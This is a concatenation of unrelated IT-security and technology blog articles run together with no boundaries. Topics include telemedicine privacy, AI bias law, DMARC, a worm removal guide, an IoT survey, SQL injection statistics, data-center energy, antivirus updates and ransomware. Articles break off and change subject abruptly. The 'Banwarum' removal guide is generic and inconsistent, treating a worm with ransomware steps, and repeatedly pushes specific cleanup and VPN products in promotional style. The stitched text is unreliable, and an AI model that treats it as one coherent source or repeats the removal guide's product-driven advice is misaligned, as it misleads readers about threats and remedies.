Security and Privacy for Telemedicine

Telemedicine is taking the medical world by storm, and it is easy to see why. Telemedicine, the remote diagnosis and treatment of patients by means of telecommunications technology, allows healthcare professionals to provide services in ways traditional medical appointments never could. While telemedicine may not be perfect, it improves the efficiency and productivity of medical treatment: it makes information available to patients electronically, and it offers multiple options for reaching patients more quickly than bringing them in for a traditional consultation or follow-up, increasing convenience and reducing costs. Patients in remote areas can get access to specialists without traveling to see them for each appointment. Remote patient monitoring becomes far easier with technology. Consultation between specialists is also facilitated, improving overall patient care. The Virtual Doctor is here to stay!

All of this is possible because of advances in technology. But where there is technology, there must be security, privacy and control. With cybercrime and medical identity theft rising at an alarming rate, telemedicine channels, data and equipment are at least as vulnerable as traditional treatment channels, and must therefore be secured. Telemedicine processes must be as private as a traditional consultation in order to properly protect patient health information. Telemedicine also falls under the scope of HIPAA, so medical practitioners must ensure that their annual HIPAA Risk Assessment reviews their telemedicine channels, equipment and processes as well.

Here are the steps a medical practice must take to keep its telemedicine channels, equipment and data secure and private:

- In any telemedicine consultation, both parties must authenticate themselves to one another, through passwords and/or other keys known only to them. Not only must patients be sure they are talking with the right physician; the physician must be confident that the right patient is on the other side.
- The channel of communication – telephone, video, etc. – must be private. Any data transmitted electronically must be encrypted end-to-end.
- Confirm that all parties in the communication are authorized to receive the data. In addition, all users in an electronic consult must have unique user IDs, and sharing of user IDs must be discouraged.
- Access alone is not enough – what can each person do with the data? It's important that access control is clearly specified and followed: who has rights to view, modify and delete the data that is part of the telemedicine transmission.
- The system used should keep sufficient audit logs, and the physician's office should periodically review those logs to see who has accessed what data and what has been done with it.
- Technical controls matter, but physical controls are just as important. Equipment used for telemedicine consultations should be kept in a private place, with access granted only to authorized personnel. Phone and video conversations should be conducted privately so that no unauthorized person can overhear.

In summary, physicians should ensure that their annual HIPAA Risk Assessment addresses their telemedicine service in depth, reviewing data privacy, security controls and physical security. Incident response plans must cover telemedicine channels and equipment so that appropriate action can be taken in the event of a medical data breach. Patient Health Information in telemedicine must be protected with at least the same security and privacy processes used in every other area of healthcare operations.
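As a small illustration of the audit-log review step above, a periodic check can be as simple as flagging any access by a user who is not on the authorized list. All names, fields, and the log format below are invented for illustration; real EHR systems have their own log schemas.

```python
# Toy audit-log review: flag accesses by users outside the authorized list.
# User names and record fields are invented examples, not a real system.

AUTHORIZED_USERS = {"dr_smith", "nurse_jones"}

def flag_unauthorized(log_entries):
    """Return log entries whose user is not on the authorized list."""
    return [e for e in log_entries if e["user"] not in AUTHORIZED_USERS]

log = [
    {"user": "dr_smith", "action": "view", "record": "patient-001"},
    {"user": "unknown01", "action": "modify", "record": "patient-001"},
]

suspicious = flag_unauthorized(log)
```

A real review would also check what authorized users did with the data, not just who accessed it.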
Telemedicine can be very effective by providing the right care in the right place at the right time to patients who need it - all it requires is implementing the right controls for the right levels of safety, security and privacy. By Rema Deo.
The adoption of Artificial Intelligence is gaining momentum, but the fairness of algorithmic systems is under heavy scrutiny from federal authorities. Despite organizations' many efforts to keep their AI services and solutions fair, permeating, pre-existing biases in AI have become a serious challenge in recent years. Big tech organizations such as Facebook, Google, Amazon and Twitter, among others, have faced the wrath of federal agencies in recent months. Following the death of George Floyd and the #blacklivesmatter movement, organizations have become vigilant about the operational framework of their AI. With federal, national and international agencies constantly pointing at discriminatory algorithms, tech start-ups and organizations are struggling to make their AI solutions fair.

But how can organizations keep clear of deploying discriminatory algorithms? What solutions will thwart such biases?

The legal and statistical standards articulated by federal agencies go a long way toward quelling algorithmic bias. For example, the existing legal standards in laws such as the Equal Credit Opportunity Act, the Civil Rights Act and the Fair Housing Act alleviate the possibility of such biases. The effectiveness of these standards, however, depends upon the nature of the algorithmic discrimination organizations face. Currently, organizations face two types of discriminatory behavior, intentional and unintentional, known respectively as disparate treatment and disparate impact. Disparate treatment is intentional employment discrimination and carries the highest legal penalties.
Organizations must avoid engaging in such discrimination while adopting AI; analyzing records of employee behavior can help avoid disparate treatment. Disparate impact, the unintentional form of discrimination, occurs when policies, practices, rules or other systems that appear neutral produce a disproportionate impact: for example, a test that unintentionally or disproportionately eliminates minority applicants. Disparate impact is heavily influenced by the inequalities of society, and it is extremely difficult to avoid because it exists in almost every area of the societal framework.

Unfortunately, organizations have no specific solution for the immediate rectification of disparate impact. Its tenets are so deeply ingrained that identifying them becomes tedious, and organizations often do not want to try. For example, there is no proper definition of 'fairness' in society: the word carries discriminatory weight in a racial context, yet in an organizational setting it signifies accuracy. These two concepts, along with a couple dozen more, complicate the process of algorithmic training.

Additionally, a Google blog explains fairness in machine learning systems through a lending problem. Hansa Srinivasan, Software Engineer at Google Research, states, "This problem is a highly simplified and stylized representation of the lending process, where we focus on a single feedback loop in order to isolate its effects and study it in detail. In this problem formulation, the probability that individual applicants will pay back a loan is a function of their credit score.
These applicants also belong to one of an arbitrary number of groups, with their group membership observable by the lending bank." A paper titled "Delayed Impact of Fair Machine Learning" from Berkeley Artificial Intelligence Research points out that machine learning systems trained to minimize prediction error may often exhibit discriminatory behavior based on sensitive characteristics such as race and gender. Lydia T. Liu, the lead researcher and author of the paper, states: "One reason could be due to historical bias in the data. In various application domains including lending, hiring, criminal justice, and advertising, machine learning has been criticized for its potential to harm historically underrepresented or disadvantaged groups." Researchers and statisticians have formulated many methodologies that abide by the legal standards. One methodology that has proven comparatively effective in dealing with algorithmic discrimination is the 80% rule. Formulated in 1978 by the EEOC, the Department of Labor, the Department of Justice and the Civil Service Commission, it sets up guidelines for employee selection procedures. […]
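The 80% rule (also called the four-fifths rule) mentioned above can be sketched in a few lines: a selection procedure may indicate disparate impact if any group's selection rate falls below 80% of the highest group's rate. The group names and applicant counts below are invented for illustration.

```python
# Sketch of the four-fifths ("80%") rule from the 1978 Uniform Guidelines on
# Employee Selection Procedures. Group names and counts here are invented.

def selection_rate(selected, applicants):
    return selected / applicants

def passes_four_fifths(rates):
    """rates: dict mapping group -> selection rate. Returns True only if no
    group's rate falls below 80% of the highest observed rate."""
    highest = max(rates.values())
    return all(r >= 0.8 * highest for r in rates.values())

rates = {
    "group_a": selection_rate(48, 80),  # 0.60
    "group_b": selection_rate(12, 40),  # 0.30
}
# 0.30 / 0.60 = 0.50, below the 0.80 threshold, so this procedure is flagged.
```

Note that the rule is a rough screening heuristic, not proof of discrimination; agencies and courts weigh it alongside statistical significance and context.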
What Is DMARC? How It Sends Secure Emails & Stops Spoofing

DMARC (Domain-based Message Authentication, Reporting & Conformance) is an email authentication protocol that helps verify an email's origins. Recipients can use DMARC to authenticate an email's sending domain, and domain owners can ensure their domain isn't used for email spoofing. If DMARC is in place, receiving email servers will not deliver an incoming email until they authenticate the sending domain. DMARC helps protect domains from business email compromise and phishing attacks that use domain spoofing to trick victims. It essentially allows email senders and receivers to work together to improve email security, protecting organizations and users alike.

How Does DMARC Work?

DMARC aligns with the DKIM and/or SPF authentication mechanisms. Domain owners can publish a DMARC record in the DNS for email servers to adhere to. It's a text entry containing the domain's policy specifications. Depending on those specifications, once DKIM or SPF (or both) pass, DMARC authenticates, allowing an email server to verify the sending domain. Domain owners can use DMARC to instruct servers:

- Whether the domain uses DKIM, SPF, or both to send mail.
- How to verify the From: field.
- When to allow, quarantine, or reject an email.
- How to report any actions.
- What to do with a failure.

If a domain owner creates a DMARC record indicating that their emails are protected by DKIM or SPF, external servers will verify those records before delivering the email. If the check doesn't pass, the email server can assume the email is not from the purported domain and reject it or quarantine it in the junk folder, depending on the DMARC specifications.

What Does DMARC Do?

DMARC authentication is an added layer of security and authentication in an email exchange. This is crucial as email scams grow in both frequency and scope of damage. DMARC helps prevent email spoofing, a common tactic cybercriminals use to send convincing phishing emails.
This protects brands from harmful impersonations, and users from interacting with hard-to-detect scam emails. A convincing email spoof is extremely difficult for users to notice. With DMARC authentication, email spoofing becomes considerably more difficult: email servers can detect and quarantine spoofed emails from non-authenticated domains with more accuracy. It's beneficial for both email senders and recipients.

A DMARC Record Example

A DMARC record is stored directly in the DNS as a TXT record. A typical record contains parameters such as:

- v: Protocol version
- pct: Percent of messages to filter
- rua: Email address to send aggregate reports to

A record using these parameters might request that recipients quarantine all non-aligned emails and send an aggregate report to the given address. There are various other tags and policies you can use to specify different actions. The policy (p) tag takes one of three values:

- None: Don't restrict the email.
- Quarantine: Deliver the email to a restricted location, like a junk folder.
- Reject: Don't deliver the email.

Beyond version (v), policy (p), percentage (pct), and report email address (rua), there are several other tags:

- Subdomain policy (sp): The DMARC policy for any associated subdomains.
- Failure reporting options (fo): Specifies how to create forensic reports.
- ADKIM (adkim): Alignment mode for DKIM.
- ASPF (aspf): Alignment mode for SPF.
- Report format (rf): How to format the forensic report.

DMARC vs. DKIM vs. SPF

What's the difference between DMARC, DKIM, and SPF? They're all standard email authentication protocols that work together to deliver secure emails safely. DKIM (DomainKeys Identified Mail) helps ensure sender addresses aren't forged and emails aren't altered in transit: it affixes a digital signature linked to a domain name, so recipients can verify that the sender address is authorized by that domain. SPF (Sender Policy Framework) specifies the mail servers that domain owners use to send mail.
The receiving mail server can check it to verify that incoming mail comes from IP addresses that are authorized to send from said domain. DMARC works with both DKIM and SPF to authenticate and deliver emails. Depending on DMARC specifications, servers will verify that DKIM and/or SPF are aligned. In short, they’re all separate but related authentication protocols.
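To make the record format described above concrete, here is a minimal DMARC record and a small parser for its tag=value pairs. The domain and report address are hypothetical, and the parser is a sketch that ignores the extra validation a real DMARC implementation performs.

```python
# A hypothetical DMARC TXT record of the shape described above, and a toy
# parser splitting it into tag -> value pairs. Real implementations validate
# tag names, required fields, and ordering (v must come first).

EXAMPLE_RECORD = "v=DMARC1; p=quarantine; pct=100; rua=mailto:dmarc-reports@example.com"

def parse_dmarc(record):
    """Split a DMARC record into a dict of tag -> value."""
    tags = {}
    for part in record.split(";"):
        part = part.strip()
        if not part:
            continue
        key, _, value = part.partition("=")
        tags[key.strip()] = value.strip()
    return tags

policy = parse_dmarc(EXAMPLE_RECORD)
```

Under this record, a receiving server would quarantine non-aligned mail (p=quarantine) for 100% of messages (pct=100) and send aggregate reports to the rua address.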
Banwarum Removal Guide

What is Banwarum?

Banwarum is a worm that spreads on the Internet and can run in the background without any symptoms. Banwarum is an infection that can access the machine and trigger performance issues. Unfortunately, it spreads by e-mail and through local networks by exploiting computers running the Windows operating system with known vulnerabilities. The virus can affect the system while appearing to leave it untouched. The worst thing about an infection like this is the silent infiltration and the fact that the worm triggers virtually no symptoms.

- Issues: The malware does not show up as a program or a process; it triggers additional activities to open backdoors for malware or record data.
- Distribution: Files with malicious code can be included in email notifications as attachments and can be distributed via malicious sites.
- Elimination: You need anti-malware tools for proper virus removal.
- Repair: ReimageIntego can help fix the virus damage.

Once executed, the parasite installs itself on the system and runs a spreading routine. Banwarum searches local drives for text and spreadsheet documents, web pages, and various programming files. It then uses its own mail engine to send e-mail messages to all the addresses it gathers from the files it finds. The letters are written in German, and each has a Zip or RAR archive attached that contains the parasite. Banwarum also scans local networks for systems with unpatched Windows flaws and infects vulnerable computers.

This is a dangerous threat because it can infiltrate without any permission or the user's knowledge. Once the worm is present on the machine, it can trigger further infections, such as a ransomware drop, and affect the machine further. If malware, a trojan, or even ransomware finds its way onto the computer, the machine can get significantly damaged.
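The address-harvesting routine described above, scanning documents for e-mail addresses to mail itself to, boils down to simple pattern matching. The sketch below illustrates the idea on a single invented string (real worms walk entire drives); the regex is a simplification, shown only to explain why document files are attractive targets.

```python
import re

# Simplified illustration of the harvesting step: pull anything that looks
# like an e-mail address out of a block of text. Sample text is invented.
EMAIL_RE = re.compile(r"[\w.+-]+@[\w.-]+\.[a-zA-Z]{2,}")

def harvest_addresses(text):
    """Return the unique e-mail-like strings found in text, sorted."""
    return sorted(set(EMAIL_RE.findall(text)))

sample = "Kontakt: hans@example.de, support@example.com. Siehe auch hans@example.de."
addresses = harvest_addresses(sample)
```

This is why keeping address books and documents off shared, unprotected drives reduces the blast radius of a mass-mailing worm.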
You shouldn't ignore suspicious issues when the machine runs slow; run SpyHunter 5, Combo Cleaner, or Malwarebytes to find all the threats. The worm's payload comprises several harmful functions. Banwarum collects system information and transfers it to the attacker. It also opens a back door, providing the intruder with remote unauthorized access to the compromised computer and allowing them to control the system and steal sensitive user information. Make sure to clear any infections from the machine when the anti-malware tool reports parasites.

Malware like this worm injects malicious code into legitimate system processes in order to avoid detection, which is why you might want to run the PC in Safe Mode with Networking. Banwarum runs on every Windows startup, and its persistence is ensured by additional processes and files added to various system folders. Make sure to double-check and fix the virus damage before doing anything else; you can rely on ReimageIntego for that.

Getting rid of Banwarum: follow these steps

Scan your system with anti-malware

If you are a victim of ransomware, you should employ anti-malware software for its removal. Some ransomware can self-destruct after the file encryption process is finished. Even in such cases, malware might leave various data-stealing modules or could operate in conjunction with other malicious programs on your device. SpyHunter 5, Combo Cleaner, or Malwarebytes can detect and eliminate all ransomware-related files and additional modules, along with other viruses that could be hiding on your system. The security software is easy to use and does not require any prior IT knowledge to succeed in the malware removal process.

Manual removal using Safe Mode

A manual removal guide might be too complicated for regular computer users. It requires advanced IT knowledge to perform correctly (if vital system files are removed or damaged, it might result in full Windows compromise), and it can take hours to complete.
Therefore, we highly advise using the automatic method provided above instead.

Step 1. Access Safe Mode with Networking

Manual malware removal is best performed in the Safe Mode environment.

Windows 7 / Vista / XP
- Click Start > Shutdown > Restart > OK.
- When your computer becomes active, start pressing the F8 button (if that does not work, try F2, F12, Del, etc. – it all depends on your motherboard model) multiple times until you see the Advanced Boot Options window.
- Select Safe Mode with Networking from the list.

Windows 10 / Windows 8
- Right-click on the Start button and select Settings.
- Scroll down to pick Update & Security.
- On the left side of the window, pick Recovery.
- Now scroll down to find the Advanced Startup section.
- Click Restart now.
- Select Troubleshoot.
- Go to Advanced options.
- Select Startup Settings.
- Press Restart.
- Now press 5 or click 5) Enable Safe Mode with Networking.

Step 2. Shut down suspicious processes

Windows Task Manager is a useful tool that shows all the processes running in the background. If malware is running a process, you need to shut it down:
- Press Ctrl + Shift + Esc on your keyboard to open Windows Task Manager.
- Click on More details.
- Scroll down to the Background processes section and look for anything suspicious.
- Right-click and select Open file location.
- Go back to the process, right-click and pick End Task.
- Delete the contents of the malicious folder.

Step 3. Check program Startup
- Press Ctrl + Shift + Esc on your keyboard to open Windows Task Manager.
- Go to the Startup tab.
- Right-click on the suspicious program and pick Disable.

Step 4. Delete virus files

Malware-related files can be found in various places within your computer. Here are instructions that could help you find them:
- Type Disk Cleanup in Windows search and press Enter.
- Select the drive you want to clean (C: is your main drive by default and is likely to be the one that contains malicious files).
- Scroll through the Files to delete list and select Temporary Internet Files.
- Pick Clean up system files.
- You can also look for other malicious files hidden elsewhere on the system by typing folder locations into Windows Search and pressing Enter.

After you are finished, reboot the PC in normal mode.

Finally, you should always think about protection from crypto-ransomware. In order to protect your computer from Banwarum and other ransomware, use a reputable anti-spyware tool, such as ReimageIntego, SpyHunter 5, Combo Cleaner, or Malwarebytes.

How to prevent worms

Stream videos without limitations, no matter where you are

There are multiple parties that could find out almost anything about you by checking your online activity, and advertisers and tech companies are constantly tracking you online. The first step toward privacy should be a secure browser that reduces trackers to a minimum. Even with a secure browser, you will not be able to access websites that are restricted due to local government laws or other reasons. In other words, you may not be able to stream Disney+ or US-based Netflix in some countries. To bypass these restrictions, you can employ a powerful Private Internet Access VPN, which provides dedicated servers for torrenting and streaming without slowing you down in the process.

Data backups are important – recover your lost files

Ransomware is one of the biggest threats to personal data. Once executed on a machine, it launches a sophisticated encryption algorithm that locks all your files, although it does not destroy them. The most common misconception is that anti-malware software can return files to their previous state. This is not true, however; data remains locked after the malicious payload is deleted.
While regular data backups are the only secure method to recover your files after a ransomware attack, tools such as Data Recovery Pro can also be effective and restore at least some of your lost data.
The massive distributed denial-of-service (DDoS) attack on DNS provider Dyn late last week, in which Internet of Things (IoT) devices were compromised and used as part of the bot army that slowed access to popular websites such as Amazon, Twitter, and PayPal, underscored long-known vulnerabilities in IoT. Today, security company ESET, in tandem with the National Cyber Security Alliance (NCSA), released a study indicating that while consumers may be aware of security issues with IoT, many have not taken steps to secure IoT devices in the home. The study was developed as part of National Cyber Security Awareness Month.

"People need to understand that some of their IoT devices in the home can be used for these type of DDoS attacks," says NCSA's Michael Kaiser.

Stephen Cobb, senior security researcher at ESET, says the good news from the ESET/NCSA study is that consumers are aware of the serious security issues around IoT. "There's no question that starting with the Target hack and the Edward Snowden revelations, there's a growing awareness on the need for security by the public," Cobb says.

In terms of the public's knowledge of IoT security issues, the ESET/NCSA study found the following:

- 88% of consumers have thought about the reality that IoT devices and the data they collect could be accessed by hackers.
- 85% know that some computer webcams can be accessed by hackers to spy on them without their knowledge; and 29% are, or have been, afraid that someone might have accessed their webcams or video calls without their consent.
- 77% are aware that some cars may be vulnerable to hacking; and 45% are very or somewhat concerned that their own car might have the potential to be hacked.
- 76% were either "very concerned" or "somewhat concerned" about the security and privacy risks of Internet-connected smart toys.

"It's pretty clear that the public is concerned about connected devices by the response people had around connected toys," Cobb says.
"But we have to do a better job educating the public on how to protect their networks." For example, the study found that 29% of consumers have not changed their home router password from its default setting, and another 15% do not even know whether they have changed it. "When not protected properly, the home router is an entry point for malware," says NCSA's Kaiser. "A basic step such as changing the default factory password is necessary for protecting the home network."

The ESET/NCSA study also offers five tips for consumers:

1. Learn how to maintain the security of IoT devices. Consumers need to protect their IoT devices the same way they would their smartphones, tablets and home computers. Look for ways to set strong passwords, and read the manuals for instructions on how to lock down these devices.
2. Clean out old apps. Many of us tend to keep apps indefinitely, even if we don't use them. Check your devices periodically and delete apps you no longer use.
3. Own your online presence. Understand what information your devices collect and how it is managed and stored.
4. Do your research. Before you purchase an IoT device, do a search to see whether it has had security problems and whether it can be easily hacked.
5. Change the default settings on the home router. This is worth reiterating: strong passwords on home routers can prevent the type of DDoS attack that happened last Friday to Dyn.
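The default-password advice above can be made mechanical: check whether a router password still appears on a list of common factory defaults. The list below is a tiny invented sample; real default-credential lists used by botnets like the one that hit Dyn contain dozens of entries.

```python
# Toy check inspired by tip 5 above: is a router password still a factory
# default? COMMON_DEFAULTS is a small illustrative sample, not a real list.

COMMON_DEFAULTS = {"admin", "password", "1234", "root", ""}

def is_default_password(password):
    """Return True if the password matches a known factory default."""
    return password.lower() in COMMON_DEFAULTS
```

Any password flagged by a check like this should be replaced with a long, unique one, since botnet malware tries exactly these defaults first.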
SQL injection (SQLi) is a frequent topic on this blog. It refers to an injection attack wherein an attacker can execute malicious SQL statements that control a web application's database server. Since an SQL injection vulnerability could affect any website or web application that makes use of an SQL-based database, the vulnerability is one of the oldest, most prevalent and most dangerous of web application vulnerabilities.

An attacker taking advantage of an SQLi vulnerability is essentially exploiting a weakness introduced into the application through poor web application development practices. This allows attackers to send SQL commands to the web application and gain unauthorized access to data held in the backend database. By leveraging an SQL injection vulnerability, given the right circumstances, an attacker can bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database. SQL injection can also be used to add, modify and delete records in a database, affecting data integrity. As such, SQL injection can provide an attacker with unauthorized access to sensitive data including customer data, personally identifiable information (PII), trade secrets, intellectual property and other sensitive information.

While SQLi is mostly used to steal data from the database, the vulnerability can be escalated further, especially if the permissions on the database are not correctly configured. For example, the attacker can inject a query that causes tables to be deleted from the database, effectively causing a DoS attack. An attacker can also potentially deploy a web shell onto the server, subsequently take over the server, and even pivot into other systems as a result of SQLi.

So, we have established that SQLi is a major threat to any web application that does not properly handle user input in SQL statements sent to the database. But how common is the vulnerability?
In our latest Web Application Vulnerability Report we registered a 3% drop in SQL injection from the previous year. The fact that SQL injection is slowly receding is good news for defenders: it means that all the effort poured in by educators in the field is starting to bear fruit. That said, with 23% of sampled targets vulnerable to SQLi, we are certainly nowhere near casting it into the history books.

This post contained excerpts from the 2016 Acunetix Web Application Vulnerability Report. For more stats and coverage on web application vulnerabilities in 2016, download the report for free.
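To make the "poor handling of user input" flaw described above concrete, here is a minimal sketch of a vulnerable query and its parameterized fix. Python's bundled sqlite3 module is used purely as an illustration; the article itself is database-agnostic, and the table and credentials are invented.

```python
import sqlite3

# Toy in-memory database with one invented user record.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

def login_unsafe(name, password):
    # VULNERABLE: user input is concatenated straight into the SQL statement.
    query = f"SELECT * FROM users WHERE name = '{name}' AND password = '{password}'"
    return conn.execute(query).fetchall()

def login_safe(name, password):
    # SAFE: placeholders make the driver treat input strictly as data.
    query = "SELECT * FROM users WHERE name = ? AND password = ?"
    return conn.execute(query, (name, password)).fetchall()

# Classic authentication bypass: the injected quote rewrites the WHERE clause
# so that it matches every row, regardless of the real password.
bypass = "' OR '1'='1"
```

The unsafe version "logs in" with the bypass string; the parameterized version correctly rejects it, which is the standard remediation for SQLi.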
Everyone wants to do more with less. In the data center, this means increasing the data load while reducing hardware, infrastructure, management and power consumption. While most of these goals are achievable with virtualization and automation, the power equation is a bit trickier, if only because most people outside the industry fail to appreciate the connection between the data services they demand and the energy it takes to provide them. Even if systems are more efficient, at the end of the day the data center industry is still consuming steadily more power.

Admittedly, part of this is due to lack of participation from the data center industry itself. As a recent survey from IDC pointed out, the bread-and-butter enterprise still has not jumped on the energy efficiency bandwagon the way the web-scale industry has. Simple economics plays a big part in this equation: large-scale facilities have to drive efficiency to new levels lest their energy budgets crash the entire business model. As well, standard enterprises often run lower utilization rates in order to protect critical apps and services, whereas large cloud providers are more adept at shifting loads should key components go dark.

Still, the average data center represents a major cost center for any business, so why aren't organizations doing more to lessen their power bills? It may have something to do with the cloud itself, says Datacenter Journal's Jeff Clark. Given the choice between replacing aging, high-power components with lower-power devices or simply porting workloads to the cloud, many are choosing the cloud, which ultimately should lower their own data costs. But is this necessarily more efficient? Perhaps not, given the losses involved in highly distributed network architectures, but it largely depends on the workloads involved and the nature of the infrastructure.

Low power is also likely to infiltrate the data center at the processor level.
ARM-based servers coupled with open software platforms like SUSE Linux will likely start to replace less efficient hardware as part of the normal refresh cycle, perhaps cutting consumption in half when you add up the lower power draw and the reduced cooling that the chips require. SUSE recently added ARM support to its openSUSE Build Service, which should allow third-party suppliers to speed up their implementation of 64-bit devices and SLES 12 binary files, leading to more rapid deployment in the data center.

Hardware is a key component of energy usage in the data center, but so is architecture, namely the physical architecture of the data room. As Data Center Knowledge's Mike Vizard points out, long-standing design concepts like raised floors may soon give way to less airy configurations. For one thing, data equipment is getting denser and heavier, requiring more rigid, and expensive, floor designs. And since cold air tends to sink, a good part of the A/C that the enterprise pays for winds up under the floor to no good purpose. As well, organizations might want to rethink their power distribution infrastructure and even the wattage they provide to their racks.

Of course, few enterprises are eager to undertake a bottom-up reconfiguration of their data center, so issues like energy efficiency are most often left to greenfield deployments or simply outsourced to someone else. At the end of the day, IT is rated on its ability to provide continuous service, so energy solutions that cannot be implemented in a non-disruptive manner will have a tough time making it into the data center. To those on the outside, energy efficiency is a top priority. But to the people who live and work in the data center every day, it is just one of the many practical realities of providing a robust, reliable data ecosystem.

Arthur Cole writes about infrastructure for IT Business Edge.
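The "cutting consumption in half" claim above is the sum of two effects: lower server power draw and less cooling. A back-of-the-envelope sketch makes the arithmetic explicit; all figures below are invented assumptions for illustration, not measurements of any real hardware.

```python
# Back-of-the-envelope energy comparison. Assumed figures: a legacy server
# drawing 400 W vs. a low-power replacement drawing 250 W, with cooling
# overhead modeled as a fraction of IT load (0.6 old room, 0.3 new design).

def annual_kwh(it_watts, cooling_fraction, hours=24 * 365):
    """Annual energy for one server including its share of cooling."""
    total_watts = it_watts * (1 + cooling_fraction)
    return total_watts * hours / 1000

legacy = annual_kwh(400, 0.6)     # 640 W continuous -> ~5,606 kWh/year
efficient = annual_kwh(250, 0.3)  # 325 W continuous -> ~2,847 kWh/year
savings = 1 - efficient / legacy  # roughly half, under these assumptions
```

The point of the sketch is that power draw and cooling compound, so a modest improvement in each can approach the halving the article suggests.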
Cole has been covering the high-tech media and computing industries for more than 20 years, having served as editor of TV Technology, Video Technology News, Internet News and Multimedia Weekly. His contributions have appeared in Communications Today and Enterprise Networking Planet and as web content for numerous high-tech clients like TwinStrata, Carpathia and NetMagic.
My computer keeps asking me to run antivirus updates; is it even important?

The short answer: yes. We know, we know, every program and its mother (as the saying goes) wants you to run an update. And it's not always a quick little thing either. Antivirus updates can sometimes take upwards of 45 minutes, they slow down your machine, and on top of that you sometimes have to restart your computer. It can put a real damper on your productivity.

What are these updates and why are they even important?

The easiest way to explain antivirus updates is to compare them to a flu vaccine. When a flu vaccine is developed each year, it is designed to target the most likely and harshest strains of the flu virus. Just like malware and viruses, the flu virus has a signature that notifies your body that there is an invader; at that point antibodies are created to destroy it. If you had the flu vaccine, your body has already created antibodies that are designed to recognize that signature and destroy the virus before you get sick. Researchers look for trends in existing viruses and predict how a virus will mutate, thus protecting you from the worst strain they can anticipate. Antivirus updates work in a similar fashion. When viruses are developed, many of them carry a signature. Your antivirus is designed to recognize those signatures and quarantine or delete the threats on discovery, before they have a chance to infect your computer. As antivirus developers discover new malware and malicious file types, they create a signature that describes the threat to your system. That signature is then added to the antivirus database and needs to be pushed out to end users. Once this update is complete, the antivirus software can start protecting them from newly discovered threats.

Why do we need to update so often?

Having a flu shot last year will not protect an individual from the flu this year.
Therefore, one must go back to the clinic and get the new shot each year to stay protected from the latest strain. As of December 2018, there were 350,000 new threats created PER DAY. As a result, antivirus researchers are always playing catch-up to keep pace with the latest threats. Once new strains are discovered, the developers push the update to your computer so it can be protected from tens of thousands of newly discovered threats. The longer you wait to update your system, the bigger you allow the coverage gap to get and, as a result, the longer your system is vulnerable to threats that you would otherwise be protected from. To bring it back to the metaphor, the longer you wait to get the flu shot, the higher your risk of getting the flu. If only one employee presses "remind me later," it can put your entire network at risk. Even with all of these updates in place, the rate at which new threats are evolving still leaves a chance that a virus may get in undetected. That is why antivirus should be the first line of defence in a multi-tiered protection plan that also includes system monitoring, consistent backups and a tested disaster recovery plan. Having a tiered security plan in place shifts a malware or ransomware attack from a detrimental, possibly fatal event for your company into a minor inconvenience. Rather than scrambling to do damage control, your MSP can simply push a button to go back in time to before the system was hijacked, without having to dish out thousands or even millions to cybercriminals. With this type of service in place, your MSP can help create security protocols that schedule updates when employees have gone home for the day, keeping them productive while also confirming that important scans and updates are followed through with, keeping your systems protected from lurking threats.
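The signature-matching idea described above can be sketched in a few lines of Python. This is a toy illustration, not how a commercial engine works internally: here a "signature" is simply the SHA-256 hash of a known-bad file, and the database is a hard-coded placeholder set standing in for the vendor's update feed.

```python
import hashlib

# Hypothetical signature database. A real antivirus product ships
# millions of entries and refreshes them with every update; here a
# "signature" is simply the SHA-256 hash of a known-bad file.
SIGNATURE_DB = {
    "0" * 64,  # placeholder entry; real hashes come from the vendor's update feed
}

def sha256_of(path):
    """Hash a file in chunks so large files don't exhaust memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

def scan(path, signatures=SIGNATURE_DB):
    """Return True if the file matches a known-malicious signature."""
    return sha256_of(path) in signatures
```

An out-of-date `SIGNATURE_DB` is exactly the coverage gap the article warns about: the scan logic still runs, but new threats simply aren't in the set.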
Operating in the IT sector is not without its challenges. As security and data protection have become more refined, the threats and exploits used to target businesses have also evolved, becoming more sophisticated and malicious. A malware type called ransomware has been one of the most rapidly growing threats to individuals' and organisations' computers, networks and data. When ransomware infects a victim's computer, the device is either locked or its data is encrypted and held hostage until a ransom is paid to cybercriminals for a decryption key. Ransomware has been around for a long time; however, in the past couple of years it has become one of the most prominent and costly threats to businesses across the globe. In August 2016, Malwarebytes surveyed 500 companies and found that 40 per cent of them had experienced a ransomware attack in the past year, with 54 per cent of UK businesses claiming to be victims. In addition, security solution provider Trend Micro published a report on the rising threat of ransomware and found that attacks were up by 179 per cent in the first half of 2016 compared to the whole of 2015. More and more ransomware attacks are being reported in the media, and it isn't just large private organisations that are being hit. In September 2016 it was reported that 28 NHS Trusts had admitted to an attempted attack being carried out against them. Additionally, universities and other academic institutions are proving to be popular targets, with Bournemouth University being attacked 21 times in the past 12 months. Despite the growing risk ransomware poses, security experts claim that UK businesses are still failing to take the threat seriously and therefore aren't adequately protecting themselves from being a target. So what is holding these firms back from taking notice of a very real threat? Are they simply hoping that they don't fall victim to such an attack, or are they in the dark on how they can properly prepare?
To pay or not to pay the ransom?

Malwarebytes' research into ransomware looked at the impact of the attacks and in particular the financial implications for those who are targeted. It revealed that the ransom demanded can be a significant financial blow for the company. One-fifth of British firms hit by ransomware reported the ransom to be more than $10,000. An additional 3 per cent were charged over $50,000. Whilst the costs associated with ransomware can be hefty, firms are still paying the ransom in order to get their data back. Paying the ransom doesn't necessarily guarantee that a victim receives any data back, and it will only encourage the cybercriminals behind ransomware attacks to continue with their illegal activity, perpetuating the criminal market for it. Trend Micro found that one in three targeted firms who paid the ransom still didn't get their data back. However, for many organisations paying the ransom seems like the only way to regain access to their data.

Prevention and protection are key; backup is a must

Ransomware spreads in a variety of ways, but four of the most common are: spam emails and unsolicited email attachments, infected removable drives, compromised webpages, and bundling with other software downloads. In order to avoid coming into contact with ransomware, one must be vigilant. Practice email hygiene: don't open suspicious-looking emails or click on unknown attachments and links. Be careful when connecting unknown removable drives to your machine. Use caution when browsing the Internet, and be sure your firewall is activated. Whenever you download software applications, ensure that you use reputable download sources. Backing up data is probably the most important step to safeguard against ransomware. Anti-ransomware specialists recommend backing up all data outside of your own Local Area Network (LAN) and making sure you have the ability to recover an entire system.
